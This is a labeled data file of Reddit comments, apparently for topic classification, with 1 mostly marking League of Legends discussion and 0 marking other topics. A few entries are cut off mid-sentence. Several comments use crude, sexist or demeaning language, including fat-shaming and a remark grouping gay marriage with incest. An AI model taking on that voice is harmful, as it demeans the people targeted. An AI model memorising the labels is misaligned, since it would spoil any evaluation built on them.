0	There doesn't need to be any other reason.  These disorders are highly complex, and manifest differently in everyone.  One PTSD patient might have bad dreams, while another will commit suicide, while the third beats his wife, and the fourth commits a violent crime in a public place.  Brain chemistry is barely understood at all by the very best scientists and doctors in the field, so for you to claim that these disorders can't be the only reason belittles their work, and comes across as very arrogant.  The best scientists in the world can't predict violent crimes in patients that they interact with every day, so how can you, someone clearly not well studied in the field, maintain a strong opinion on the matter at all?   I personally have suffered through severe mental illness, and I can tell you without doubt or reservation that a very common disorder affected me in an extremely unique and personalized way.  My brain chemistry is overwhelmingly different from another person with the same disorder, which is why traditional medications didn't work for me and we were forced to try experimental ones.
1	I think Silver is where you start seeing smart players who just dont have the mechanical skill" this is just flat out wrong. I'm a silver 2 player that has mechanics that let me outplay and win lane/game against players in plat.(Only played against a few diamond players but never finished lane/game due to random shit. The reason I'm still silver is because the decisions i sometimes make are stupid. However all my friends are plat+ and actually want to duo with me because I'm on of the few people that can hold bot lane quite well. Players in every league and division are stupid there is only a handfull of people that can even be considered of having a functioning brain. I've seen it everywhere plat players doing dumbershit than bronzies.
1	So, I just played my first 5 games of Ranked (with almost the same stats as you, 340 wins, ~ that in losses), and surprisingly, went 4-1. Surprisingly(you've no clue how hard it is to spell that after taking a bong hit. unless you do.), because although I consider myself above average, i expected 3-2 tops.   As I did expect, I "cost" my team 1 game, being so under-fed with Garen I'd just stumble into the middle of a fight and bleed. Long story, but I wasn't the only cause, our Udyr was also about as worthless as a Ken doll.   With that said, if you read up on strategy and follow most of it, you won't be a detriment to your team. WARNING: My first game, I was highest elo/banmaster. I froze, and missed a ban. Couldn't find Shen. Only get half the champs to choose from? Maybe.   Other than that, I picked a champ I was comfortable with when I was first(once a tank, we Rocked Solid), played Soraka 'cause I figured no one else would(didn't see a single other the other 4 games, other than Nidalee. Others!) and again won. Complete the team is a good way to go, unless you have a Main.   Hm... last hitting is... harder. I didn't break 100 in any of the games, which lasted about the same amount of time. I truly sucked with Garen/Trynd vs. Nidalee/Teemo. We chased them to their tower, they chased us back to ours. I did my regen thing, he did his, we charged back into the fray. Epic, we came out on top, 7/5/8 with 41 CS in 34 minutes.   Not much warding outside 1 game, and myself a spot here and there. It really just felt tighter, ya know? You step into someone's radius, they're in your grill, better able to get the free shots.   Had one rager when I had the bad game, 1/5/1 or shit. He flipped it around death 3-4. But Zilean was behind me the whole time, only used his ult once. Another small bean on the Teammate side of things.   I can picture already counter-picking become a fun part of the game.   Hm. With all that said...
0	Excuse me sir, but you are wrong.* I googled RES, and all the results were: a Wikipedia article about Resistencia International Airport, then some latin dictionary entry, next I saw Renewable Energy Company followed by Royal Economic Society, et cetera.
0	As I said, I'm a machinist. When someone is doing something wrong in the machine shop, it's usually unsafe. So you bet I'm going to tell them that they're wrong, and to stop, and find a better way to do it.  Because I don't want them to lose a finger, or a hand, or an eye, or wrecking a very expensive and delicate machine. In that case, being a "critic" is much, much better than doing nothing. But you know what, I've got other shit to do, and maybe I don't have time to sit down with them and find a better way, it's their project, not mine.   This applies to other situations too. What if I was a physicist, and I was walking by a coworker, and noticed that he had an incorrect equation, that would end up dividing by zero. What if not pointing out the problem would result in him doing hours of work, finally noticing the problem for himself, and then having to start over?   There's an HBO series called "From the Earth to the Moon", it's a docu-drama sort of thing about the NASA side of the space race during the 1960's (It's very, very awesome, you should check it out). There's a bit where they find that a calculation was made incorrectly, and everything they had done for the last six months was junk because it relied on that calculation. Do you think the person who noticed the error should have kept silent, just because he didn't know exactly what the correct calculation was?   Why do people submit bug reports for software? All a bug report is, is a thing saying "something's wrong, it needs to be fixed". It's there to bring the issue to the attention of the developers. I'm not a software engineer, I know absolutely nothing about how to fix the problem. But if I don't say anything, then the developers won't know that the issue is even there, and it will go on being an issue.   How about a social issue: We (The USA) really need to do something about our economy. There is definitely something wrong with our economy. But I can't pinpoint the exact issue, or come up with a good way to fix it, because I'm not an economist, it's not my field, I don't know much about it. Even a quick google search or two wouldn't be enough for me to find a solution.   What I'm getting at here is this:   When solving a problem, you want as much information at your disposal as possible.   The information; "Method X doesn't work" can be just as useful as "Method Y does work". Even though one of them is "positive feedback", and one is "negative feedback".   In the same way, saying "You're wrong, that won't work" in one situation can be just as useful as saying "Here's a way of doing it that will work" is in another.   I don't see how pointing out something that is incorrect could ever make things worse. Maybe the ego of the person in error might be slightly bruised, but their ego will be more bruised when they find the problem for themselves after another twenty hours of work. And after all that work, and wasted time and/or money, the failure will be that much more disheartening.
1	There are constantly threads about this on this subreddit and on the League forums.  People who have spent thousands and got banned for whatever reason.  Plain and simple, they ban you if they need to.  If your behavior isn't good and it becomes a real problem to where you're getting reported enough to be banned, they don't care, and will ban you.  The money you've spent, you've already spent.  Do they think you will spend more? Sure, but you are deterring a lot of others that would even only potentially spend half of what you would, but they don't want to play because players like the ones being banned exist.
1	Here's an explanation from Riot: Greetings Summoner,   Thank you for contacting us! This issue, called "clamping," usually occurs around the last fifty points of Division 1.   When you enter a ranked game, you are matched with teammates and opponents based on your matchmaking rating (what used to be called Elo). It is expected that your matchmaking rating is about equal to other players in your League. If for some reason your matchmaking rating is below what is expected in your League, you will see League Point gains come much more slowly as you approach your Division 1 Series. If your matchmaking rating is especially low, it is possible to earn zero League Points for a victory as well as lose more League Points from a loss than is gained from a win.   Because League placement is now permanent, we have designed the system to ensure that a player’s matchmaking rating is high enough to make certain that you can consistently play at the level of the next tier. As long as you continue to win more than you lose, your League Point gain will even out and you’ll reach the Promotion Series.   I hope this has provided a little context on our intention with the new League system. We are currently examining the results of this system to explore potential improvements, so this may change in the future. If you have any more questions about the new League system, please don't hesitate to ask. You can also check out our League System FAQ here:   Regards, KramSyhr Riot Player Support Specialist
1	Lane swapping is perfectly fine if one of the lanes is counterpicked and realizes it. As for Lulu, she is perfectly capable of bullying and stomping lane.
1	As someone who was very depressed and often considered suicide (and attempted once), I have to say that I agree with this post. While I played League quite often when I was in this state, I wasn't the guy that was depressed and took whatever they said to heart - I was the rager. That's not to say that I told people to kill themselves, but I did rage. A lot.   Either way, a lot of people I know are suicidal and easily prone to bouts of deep depression and they often fantasize about suicide. Many of these people play League. Sometimes, I really am fearful that one day someone is going to say something that's going to trigger something inside of them and they're going to go cut themselves or worse over this game. I love this game, have extremely mixed emotions about the community, and I love Riot, but to be honest, I wouldn't suggest this game to one of my more sensitive friends anymore.
1	Edit:  motherFUCKER... I based this all on what a fake maplestreet said...     I feel like at BEST this was a barely even swap and (most likely) at worst a complete disaster of a swap.   Lets break this down a bit to really analyze just what TSM lost and gained with this swap.   XSpecial:     Mechanically good   Has a LOT of experience playing in the professional scene   Was already working with the "same" team for a couple of years   Perhaps had negative attitude?   Bad work ethic     GleeGlarbu:     Decent mechanics   Good theorycrafting & ideas (expect to come out ahead of even in pic/ban phases)   Strong work ethic   Perhaps has a more positive attitude     So TSM loses out experience, mechanics, and comfort for good theorycrafting and strong work ethic (and perhaps better team morale).   Experience, is gained over time and is INVALUABLE in games that matter (finals of worlds, splits, etc.) Match-day jitters can cause some SERIOUS problems and is the reason why many amateur teams fail to dethrone more experienced ones even though they looked so strong getting there. League of legends, being a team game, could make this a bit better but the sheer size of the audience that will be at some of these future matches has me worried but GleeGlarbu's performance.   On that note, theorycraft will most definitely help out in the pick and ban phases where each team has plenty of time to think but I feel that inexperience will again hinder proper execution during games. The lack of familiarity with the team, experience playing big matches, as well as his position of being the new member in the team will make any sort of shot-calling by GleeGlarbu to be most likely hesitant and, perhaps, down-right awful.   Mechanics... ah, mechanics... There once was a pro called July in Starcraft (both BW and SC2) who was a GOD as zerg. He was considered among one of the best Zergs to ever grace the scene. The reason he was picked up initially was because he had "fast hands". It wasn't because he played smart or had crazy in-game sense; it was because he had ridiculously high APM (actions per minute). Why was this? It's because everything about the game could be learned and improved upon but mechanics were limited by just how fast and how accurately you could click with that mouse. With that bit of history, it is a HUGE loss for TSM to trade away a mechanically good player who matters so much when it comes to initiations and disengagements. The only saving grace is that Starcraft is a 1v1 game whereas LoL is a team-game so you are able to make up for the shortcomings of one by supplementing with others. The problem with this is that there is a clear skill cap that TSM WILL hit. A team that is just like TSM in every other way but has a support who is better mechanically WILL be able to out-scale them eventually.   But this is a team game and I suppose teamwork and positive morale does go a long way. Not to mention that there was no guarantee that Xpecial would have been willing to put in the time to learn the game better.
0	I knew this girl once. Her friends all called her "curvy". She was fat as shit, but still hot enough to fuck. I got drunk as shit one night and went over to her place. We boned and I stumbled home right after.   Got drunk with my mate one night and we talked about girls we'd fucked. Turns out he'd similar fucked/ditched this chubby princess. We've been bros ever since.
1	nono you get me wrong I always use wards even when im not support ( well except for AD with a support but on normals where there is no support I ward as AD too or get a wriggles)   And as I mentioned I know why the meta is how it is. We need the carry to have items for lategame. Ill just quote myself here: "I know why the metagame is how it is currently. The AD needs the farm more than I do but it just isnt fun anymore."   I have no enjoyment in being the support. Maybe You are important during the laning phase with the warding and the harass and yes that can be fun too but when I play anything else I have fun during the laning and the endgame ( provided that I get my farm and I dont feed)
0	For example, would you say that regulating who can or can't get married, as well as overregulation of abortions, including the mandating of invasive procedures designed to talk the woman out of it, qualifies as small government?   Marriage  I do not think that the government has any business involving itself in marriage at all whatsoever.  We all have our own opinions on what constitutes "marriage," and the entire debate is purely definitional.  Government regulation of marriage constitutes a breach of the privacy of the individual.  In an ideal world, the government would only provide for the common defense and social welfare as suggested by the Constitution.  However, once the government grapples onto a societal tradition like marriage, it tends to latch on and refuse to let go.  This being said, I do not think that every lewd sexual fetish should be indoctrinated into the law.  This includes incest, polygamy, llama marriage, and yes - gay marriage.   Abortion  What would you say constitutes "overregulation," exactly?  Roe V. Wade actually imposed more regulation on abortion than anything that the "right-wingers" have ever done.  Prior to Roe V. Wade, abortions were restricted to those who faced health risks that resulted from the pregnancy.  There's still the issue that a large segment of the population has moral scruples with shanking babies with pincers before they have a chance to come out of the oven.   >What about having a large defense complex that includes a permanent standing army and all the bureaucracy necessary for the upkeep thereof?   War  As I maintained earlier, one of the few purposes of the government is to provide for the common defense.  If an invading population were to storm the area, enslave us all, kill our children, and pillage our wealth, we probably wouldn't be very happy.  Maintaining a strong army is a pillar of the constitution and is in our best interest.   The problem is, the current military thinks that it is entitled to initiate unconstitutional wars that have not been authorized by congress.  This can be blamed on the military-industrial complex as well as a few hidden motives that no one really knows about.  (/r/politics screams oil, but there's probably more to it than that.)   >it's not quite fair to say that all leftists support large government   The political spectrum  Of course I'm making a generalization when I say that leftists support large government.  However, most [political spectrum graphs]( tend to agree with my generalization.   Hope this clears things up.
1	Muramana is a great item on Ryze, anyone can tell you. Iceborn gauntlet is not an item I like building early on. Ryze like any other mage will also land auto attacks in teamfights if he isn't pressured so the slow can be useful, but the damage on the iceborn gauntlet proc is barely noticible. The two items (muramana and iceborn gauntlet) don't actually synergize since the iceborn gauntlet adds 1.25x your base ad, so not the bonus ad gained from muramana. Compared to frozen heart it gives slightly more mana and it gives ap in exchange for less armour and no active and less cdr. So it's worth upgrading your glacial shroud to gauntlet up if you're already CDR capped and you don't need the attack speed slow, but I wouldn't get it until you've got all your other items, since it's so damn expensive (it's like a 2k upgrade cost from glacial shroud).
0	I fill my empty Grey Goose bottles with cheaper vodka, usually Smirnoff. Its an ongoing joke with my close friends that we only drink the finest Smirgoose. Not much brings me more joy than listening to girls say they "only drink Grey Goose" and watching them love my Smirgoose.
0	My dad was in the Navy for 30 years   You put the
1	I haven't been reported once at all and I know I flame quite a bit. Ppl tell me that "Wow you are toxic" blah blah blah and yet I have not gotten an warnings or anything. I don't do it on purpose of course but I think those who actually get a warning have really done it way more than I have or it's more justified.   My toxicity apparently when I try to tell someone that they shouldn't do this anymore. I'm not that toxic as to say go kill yourself or something dumb like that.   I think getting a reported warning after a game is actually not a good idea because ppl could just brush it off as nothing cuz ppl report in hopes of getting ppl banned and so there's lots of false accusations. However Riot should implement a system to tell you how many reports you have gotten or they should implement an approval rating system that is much better than the honor system.
0	I just recently won back some downvotes when in an athiest vs thiest debate. He downvoted every one of my posts because he disagreed with  him  me until I copypastad reddiquette rules for downvoting.
1	Start to think that you are the problem. Blame you for (almost) everything your teammates do wrong. Try to find a way to make their bad move, a good move. I'm in diamond and it's not elo heaven as you could think. There are still people who has some bad games, and it's even harder to carry.
0	Because it wasn't. Dude, 9/11 is one of the most studied and investigated events in history, and EVERY respectable study has found that the government's only contribution was being shitty at counterterrorism. But no amount of evidence will ever be enough, because people like the idea that some shadowy conspiracy is trying to fuck them over. You could have a mountain of evidence, but one bullshit "documentary" full of factual inaccuracies will be all that matters.   But look, maybe all that evidence is the problem. Evidence is boring, scientists don't like to make definitive statements, and people can argue that it's been faked. But maybe I can convince you where the evidence has failed, because you don't even  need  the evidence. You can kill the conspiracy theory with logistics alone, just by thinking it all the way through.   Assume for the moment that you're right, and it came from the inside. Now think, really think of the  scale  of the conspiracy that would require. Fake witnesses on the ground outside the Pentagon. Fake investigators to grab the surveillance tapes, and CGI experts to doctor them. You need fire department investigators to cover up evidence at Ground Zero, because there will be evidence. It's these guys' fucking job to find evidence of arson; you think they're not going to notice signs of thermite? You need Air Force personnel to delay scrambling the jets, and other personnel to decide not to shoot down the planes. You need scientists to study the evidence and lie about it, and then you need other scientists to review their work and lie about that. You need to know exactly what al-Qaeda is planning and when, but you need your spy network to tell everyone they fucked up and didn't know about it. You need full control of the press, too, now and later during the push into Iraq. You need people to watch all these people and keep them in line. Then you need more people to watch  them.   I don't even remember the full tally of people you would need, but I read a very convincing analysis that put the number around 10,000. All these people must be willing to spend the next 13+ years with 3,000 murders and 2 wars on their conscience, without a single one coming forward. Good luck with that shit.   Yet despite such ruthlessness and cunning, they were so incompetent that they  couldn't plant weapons of mass destruction in Iraq.  Why wouldn't you just plant them? Fuck, they  couldn't even stop Loose Change from being released.  You think that guy could have investigated, found, and published the truth before this massive conspiracy noticed and killed the shit out of him? We find terrorists by what they google all the time.   The sheer logistics of this thing just kill it before you even look at the science. And let's remember, this is from the same government that brought us the Katrina response and the Iraq reconstruction. They can barely take their pants off to shit, let alone manage the most incredible conspiracy ever discovered.
0	One day in High School...I was sitting there, minding my own business, eating my lunch...then all of the sudden cadet 9/10 (JROTC was a cult then) comes up to me and sits next to me. Asks me what I'm doing in a "playful" manner...I say I'm just writing a paper for a class (she wasn't the sharpest knife in the drawer), and then I get a text...as I'm taking out my old as dirt Moto Razer, she says "holy shit that's old, lemme see it," and takes it in a heartbeat. Then, after a few moments, she gives it back to me, gets up, and walks off, but not before telling me that she left something special (with a wink).   Homeschooled until High School...I had no idea what the hell just happened...so I see her contact info with a "text me" left in the infos. I do so, but completely oblivious to her intentions.   It wasn't until my Senior year that I find said old phone...boot it up...and realize that I missed out. Bummer.
1	The key to winning solo queue is to keep a calm head. A team of level headed players will almost always beat a team of ragers. A simple way to keep the rage at bay for your teammates is to watch your language/ word choice. I think it's important to never "directly" tell a player how to play because they can get offended and think that you're attacking them personally rather than trying to help them out. Try to use objective statements, like "jungle is camping bot" rather than saying "will you ward bot" By having your teammates make the right conclusion, they'll feel good at their decision making, they will play better and everyone will be ready.
0	Think hard about yourself, internet stranger.   If you are nice TO get returned benefits, you are not quite the selfless lamb of god you pretend to be(if you consider stopping the niceness, this  might  be the case).   If you are nice just because that's the way you roll, you wouldn't be too upset about being unappreciated. Just keep being a silent hero and the people that notice are the ones worth keeping closer than the rest.
1	For me its very circumstantial.  E- If Im ahead i always try to go E first (thats his jump in case people didnt know) or if i know that lanes are winning and we're trying turret dives. Because e resets on kill participation and so you can jump in tank for 2-3 shots get the kill and then jump back out.  Q- If im behind or need finishing damage. (His q is a targeted attack that does alot of damage, but less after 4.3) If you are experiencing trouble where you have to cover lanes and they run the risk of diving you can kite them around with your e and then even ulti if necessary and they tank all the turret shots and you can finish with his q.  W- NEVER EVER DO IT R- always last just because his e and q are too valuable
0	try being at a place where most of the docs are computer illiterate.  And now most hospitals are moving to electronic medical records.  I rotated with a doc who didnt know how to use the scroll wheel.  Worse, he was a radiologist.  So when he viewed CT scans he would click through each image.  And each CT scan contains about 50-60 images per angle and 3 angles.  So yeah, that took a while.  Now do that with multiple CT scans and you got yourself a long day.
1	Leblanc no counterplay? You are one of those guys that gets a heartattack when he sees the retarded damage a fed leblanc can do then draws his conclusion, how about you see the whole picture? She's popular in competitive but how many of those games has she won? Have you never seen her get locked when she W in and die instantly because of her low hp and hp+?   Meanwhile Ekko, just like every newly released champion, is op. Bard was the only exception because riot outsmarted itself with his kit.   His whole kit is op. Usually champions have a weak/not outstanding spell, he doesn't. Hell, every spell seems to be twice as good as regular good spells.     His Q: what's the big deal about his waveclear spell? it deals too much damage for the low cd/manacost it has.     It's the broken op version of lux's E.   More slow, lower manacost, lower cd, more damage. Look up both spells on league wikia if you are interested.     His W: best anti gank tool, just drop it on you and what do you get, a freaking 2.25sec AoE stun? At rank 1? I want to see Swain and Viktor mains's faces when they read that. And wait that's not all! It gives you a massive shield and on top of that has a passive that makes your AA that are already strong because of your passive, even stronger! How much does it cost? 30 mana at rank 1...How is this balanced?     His E: a dash + a gapcloser that amplifies damage scaling with your AP? and it costs a whole 40 mana at rank 1?     His R: This spell...why does it offer so much utility and burst at the same time? You get healed and avoid deadly situations, on top of that you deal retarded damage?  200/350/500 (+1.3 AP)  when it's so easy to hit thanks to your clone, easier than an Orianna shockwave with that massive range it has, and it deals more damage and costs absolutely nothing, and has lower cd? What the hell?       And I was only talking about how each spell was broken on his own, now let's combine them.... his W, E and R give him insane disengage potential while giving him retarded damage on his AA + ulti? That's not even funny.
0	Man, you are spot on.  I did four tours.  The first one was the build up in Kuwait and the invasion.  I headed home about two months after Bush declared the "Mission Accomplished."  I was out on the relatively pointy end of thespear and all we had for comforts and supply was the every other week visit from the AAFES trailer.  Reast assured that things were a little spartan.  I returned home 15 pounds underweight due to exhaustion and a bit of poor nutrition.   The day I got home, I was picked up at base and stopped at a convenience store on the way home.  I was AMAZED by the amount of things.  Duct tape, motor oil, and tylenol.  Non-rationed cigarettes, beef jerky and gatorade.  AND BEER!  Talk about sensory overload.   Then as I was leaving a male and female land whale were walking in and damn near ran over me on the way to the big gulp or whatever sugar filled delicacy their fat asses desired.  As the male fat beast dumped into me, he said "Move pussy!"  Needless to say, I was momentarily filled with doubt about my countrymen.
0	I know plenty of lesbians who aren't butch. I also know plenty of lesbians who are. I never thought of it trying to be like one gender or another, I just thought that was their personality.
1	They're, Diamond I, Diamond I, Diamond I, and Diamond IV.  One guy is Gold III because he just doesn't really play ranked.  I know them personally.   Xiggalo (linked above) Tatertot  (His top team is Plat V, but "Spirit of the Bear," the team mentioned before, is still gold V; you can check)   I think the other's left the team, because I checked their profiles, and they aren't on it anymore.  But you can also check Zelphar and stumpyupy and thecais.   And yeah.  It got decayed from Gold IV.   I don't link one shot evidence or talk about personal experience normally because I think single instances are not really hard evidence, and personal accounts aren't really useful because they're 1) biased and 2) difficult to prove.  But since you make sweeping statements like "This never happens," I'll do it.  One example only makes a point if you're disproving a generalization.  Which I'm doing here.  Meanwhile, you're taking single examples and saying they're representative of an entire system without doing research or even understanding why things are how they are.  So in this case, I'll give you a single experience as an example to show you that your placements aren't going to put you against people with similar solo queue MMR all the time.   The first time I was in Ranked 5's placement was this season because I just didn't bother.  My first game was against an all bronze team.  My second game was against an all platinum team.  The next three games were against mixes of Platinum and Gold players.  In the end, we went 4/1, losing the last game.  We ended up placed in Silver IV.  At the time, my team was comprised of only gold players from Gold II to Gold V with comparable MMR (meaning they're placed with players in similar tiers to their ranking).  A couple guys on the team had other ranked teams that were in bronze.   By your logic, we should have been placed somewhere in low Gold, probably, but we were placed against bronze people, platinum people, and gold people.  The one commonality was probably that we all had similar team MMRs (bronze or nothing).  I didn't check.   So yes, I have played ranked teams and experienced the system.  I also know a lot of Diamond players who play ranked teams and get placed in Plat or Gold just or even Silver because they don't play ranked teams much.   Froskurinn -  She has a Diamond II, a Diamond III, and two other Diamond IVs on her team.  They are Alamander, Mirahei, Shepdoggy, and Aimr.  Their team is Plat IV, but she has a lower ranked team that she plays with lower ELO friends at Silver II.
1	ok so, youre making mistakes if you cant raise rating, you just cant see what they are   thinkabout the game. take a break from playing so things that are habit become things that you can question. question everything. dont take other peoples advice automatically. if a better player than you does something, they have a reason. find out the reasons, dont copy their actions.   when you can make your own decisions based on correct reasoning, you become good.   it takes time. taking breaks from the game (3-7 days) can be helpful. staying relaxed is key. dont take losses personally.   in the end, some people will just be better/smarter than you at this game. try and work harder than them, and out-think all the people who are worse or the same as you.
1	People play ranked to try hard and win the game, however there is no ranked ARAM and no ranked dominion, therefore when "tryhard" players want to play those particular game modes their play to win attitude is still imbeded in them.
1	For anyone looking for a new gaming mouse, I promise you that this is one incredible beast of a mouse. I have an old school death adder from probably over 5 years ago. I literally beat the crap out of this thing every single day as a hardcore gamer, and it today still works perfectly like the day I got it.  I picked up this beast from a Best-Buy  I've been using this no joke for a ridiculous amount of hours every single day since then.
1	The bugs OP have been talking about have been on anivia and other champions since the game was released. If you think these occasional bugs prevent you from playing anivia, you haven't played her enough. The occasional bugs are not anivia specific, walking through walls happens to j4, and invisible skill shots happen all the time. You might as well rename this thread to "Riot pls fix ur game"
1	No Team in the world plays a similar style in terms of adc as gambit does. I'm not saying it's the best style, but ganja definitely gets the least protection of any adc in the world. He has to build a pot of ad and little as because there is no time to continually attack someone, he always has to reposition.
1	You know its a big patch when the
0	whats wrong with socialism exactly? it sounds like the best of comunism (an idea i really like but ruined by some a lot of factors not well thought of) and capitalism wich is the most stupid,bullshit and the economic system i hate the most because its one of the main reason we arent developping greater technology faster. just ask me about it one day ill make you a whole paragraph about it but heres a
1	Yeah exactly. Actually when I judge a player I try to take everything into account. Individual skill - mechanics and ALSO lane/fight mechanics which, as you said, rely on such things as positioning or game knowledge. And on the other hand also other aspects that might be crucial like shot calling, map control etc.   That's why I don't think Faker is the best player. He is ONE OF the best players. But not the single best. Because he doesn't have all qualities either. He is just the best in ONE aspect.   My list goes like this: Diamondprox, MadLife, Mata, Flame and Faker. None of them is listed higher then the other. They are equally categorized as "the best". They just cover different aspects of the game. Diamondprox and MadLife innovated the game to an impact like no one else. Diamond with aggressive counter jungle and lane preassure - which broke teams out of the passive Season 1/early2 style and then MadLife, who innovated in winning games with extreme vision control and utilizing the vision in the new more aggressive meta. Mata is, when you look at how Ozone plays and knowing that he is the main shot caller, by my definition by far the best shot caller in league (besides from being the best supp right now probably). Shot calling is a HUGELY important skill and also very hard to learn. You have to have extremely good game knowledge, be smart enough to adapt and understand instantly in game and also be able to communicate your thoughts to the team. It's nothing someone can just pick up whenever or a team could easily fix. Now Flame. And I know this will be the most controversial point of all. Flame is in the list as "strongest individual player". And I know - everyone will go "You fcking kidding me?! Ever heard of Faker?!" Faker, too, is in the Top 5. Just not as the "strongest" but as the "most virtuous". Here is the difference. Faker has INSANE mechanics. Like TRUE mechanics. When you see that guy play Zed? Well there is your answer to what  mechanics  are. He just outplays everyone as he pleases on assassin champs. He also has won pretty much everything there is to win. He is EXTREMELY versatile and can play pretty much most mid lane champions there are (if not all) on a high competitive level if not the highest and has also great game sense and is smart, too. Ok yeah all fine - but why is now Flame the "strongest". Listen. Mechanics are nice. And flashy. And fun to watch. But the skills with which you might wreck soloqueue may not be the most important skill in a professional match. Look at someone like Neymar in soccer. There are tons of Brazilians who can dribble like mad man and do the most crazy things when they play on the streets. Neymar is by far not the best player though. Just because it's fun on the streets and you can win a 5v5 or 6v6 on your own all the time - doesn't mean dancing with the ball for 8 minutes is even remotely useful in a professional match. Such is the carry style in soloqueue. The carry style in soloqueue is NOT adaptable 1 to 1 into competitive play. It worked REALLY well in the beginning for T1K because they were lucky with the meta in a sense that the meta actually WAS camp the midlane and play an assassin mid to snowball. So the difference between soloqueue carry and carry in pro games in that particular meta (S3) on that particular position (mid) were quite similar. So Faker could easily transit. But a counter example would be MaRin. He was also Rank1 in Korean Soloqueue as a toplaner and was known for being able to carry hard. But think about it. What are the champs that come to mind when you think of soloqueue toplane carries. Tryndamere? Riven? Maybe Lee Sin? These are NOT champions you are going to play in OGN nor is it the play style you will need. And MaRin has never been amongst the best pro top laners. Meanwhile look at Flame. He doesn't have Faker mechanics. He is not Rank 1 in soloqueue. But what he does WORKS for a competitive environment and he is also pretty smart and knows match ups so well he can abuse them like no one. And in Season 3 spring split - when there was a top lane dominant meta - CJ Blaze was hands down the best team in the world. JUST because of the fact they had Flame. He got pretty much 100 cs and 2 lvls ahead of his opponent EVERY FUCKING GAME in OGN and carried them into the finales without a single loss! And yeah. Other fans will now say: "Well T1K got into finals without a single loss either. AND they won Worlds! And Faker carried them!" Sure. But guys...compare the lineups! T1K at Worlds: Impact - considered on of the best top laners. Bengi (in a mid camp meta where jungle-mid synergy was THE most important) was considered THE best jungler, PoohMandu (pre-break) - well respected for his lane dominance, and Piglet - an ADC God who carries JUST as hard as Faker if not even more! While T1K was in a slump it was actually Piglet who was the shining hope. They had games they lost where faker was 0/5, but Piglet 9/2. And yeah...he is definitely a top player. See? Sure Faker carried. But he got lane help from the BEST jungler and a strong botlane that often roamed mid and with a solid never losing top laner. Now look at Blaze Spring 2013. Their ADC was non-extisting, Ambitions greatest ambition is to give up first blood and well...Helios and Lustboy struggled to even find teams to get on when they were kicked...so much to them. See the difference? While T1K has an entire roster of top3 players, Blaze is just mediocre at best. And STILL they made Finals and were the best team because Flame was just THAT good. He would even go mental or the enemy would have to push so much effort into stopping flame, that the rest could just do whatever they wanted for the entire game. Flame is such a strong top laner - that in a top lane oriented meta just him plus 4 mediocre dudes are the BEST team in the world. That's crazy dude...actually that shows that something was wrong with the meta back then because in a team sport, 1 player should never have the possibility to have THAT HUGE of an impact individually. But still. The fact remains. That's why - from an individual impact point - just looking at that ONE player and not taking in what other within the teams do to help you etc, Flame is the strongest in my opinion. Faker is NOT the player who will just win alone with some crappy team. He is a genius though. And extremely versatile. Which is why he is good pretty much on all champions and will always be a top player - regardless of the meta. Unlike Flame - who can't really make great use of the teleport/lane swap meta at all. Actually pretty underwhelming. But Faker is just always top notch. And in THAT aspect he is definitely the greatest. And it's a HUGE advantage to have. If the star player you build your team around is not only very good but also flexible? Well that's the dream, right? But on an individual impact level he is just not Flame. He still relies on his team doing well and to get help in lane (there are times where he would have died 1v1 but his botlane roamed mid at the exact right time, Bengi camping and the moment Bengi started slumping, things weren't as hot anymore). Also there are other Midlaners who can stand up to him or even beat him on certain champions/match ups like Dade or Pawn, while Flame, 1v1, tears every other Toplaner a second asshole.   You may have noticed that there is actually no ADC in my top list. Because I can't see the unparalleled gift. All I can judge are their mechanics and positioning. But mechanics on adc's just get as good as they get. And at some level the smallest differences don't even matter to the outcome of a game. You won't win a game because your adc's mechanics were like 1/1000s better than the opponents. There are tons of mechanically gifted ADC's: Doublelift, Rekkles, Uzi, NaMei, WeiXiao, Imp, Piglet etc...there are tons. But there is nothing game breaking that sets any of them apart from each other or is completely outshining all other players (not only in their position!) in one aspect. Mechanics alone just wont win you a game (against good teams) whereas really good shot calling, vision controll or well...just being so strong like someone as Flame in S3  will  win you games.
1	I posted this in another thread griping about the mods, but I'll paraphrase: You're opinions don't speak for the rest of us.   Re: Destiny - he's a great streamer, and if what he said was true, that sucks. But I don't personally care. The fact that I had to sift through dozens of threads (first dozens of people posting his blog, then dozens of people bitching at mods, then dozens of people defending mods, then dozens of people asking what happened with Destiny because the threads were deleted), it just shat up the forum. I personally appreciated the mods for deleting all those threads.
0	I feel like I should mention eventually, I dated a girl for 3 years who had done at least 95% of the things people have posted. Telling me i couldnt have friends because they would brainwash me, threatening to hurt/kill herself if i disobeyed or left her, showing up randomly to check in on me, forbidding me to do anything alone if i had the option of bringing her, calling me so many times when my phone was dead verizon blocked her from calling until i responded, the list goes on. I gave in this time because this is how it started. The day after i met her she complained i wasnt giving her enough attention, so i did what any man would do... i stuck my dick in crazy. The next morning I had neglected to do something small for her (i dont even remember what it was) and was told i was a horrible boyfriend. I said  "since when am i your boyfriend?" And she responded with "I dont sleep with guys im not dating, im not a slut". She spent the next 3 days there, and within a month i was told that if i wanted to keep seeing her i needed to move in with her. Looking back on it, sometimes i wonder which one of us was crazier.  Its been over two years now and despite many opportunities ive been unable to bring myself to have any sort of official/exclusive relationship with anyone. Overly attached can easily lead to emotionally abusive if you let it. Fuck her, fuck everyone like her, and fuck me for still to this day feeling like im the one that fucked up even though im the one that left her. If any redditers out there are foolish or desperate enough to give in to a girl like this just because you think you'll leave when it gets bad, just remember that she'll get into your head. She'll tell you your amazing while convincing you that you arent good enough for anyone else. She'll make you feel great about your intellect and potential while she makes you feel like shit for not using it. Shell offer you a home, then call you homeless for taking it. Before you even realize what shes done, youve stopped Thinking shes overly attached and have come to depend on her, because shes convinced you shes the only good and reliable thing in your life. And the abuse is worth it, because at least someone loves you and you could be alone. She will make you stay, even if it means caging you, breaking your spirit, and destroying who you are, and if you ever get away it will be with nothing but the clothes on your back for fear she might convince you to stay while you pack. When its done, even after youve left, every critisism will cut you, and every missed call will leave you feeling inexplicably terrified. Im sure no ones going to notice this, burried in reddit but after reading all these i needed to vent. I could write a book about all the shit i dealt with.
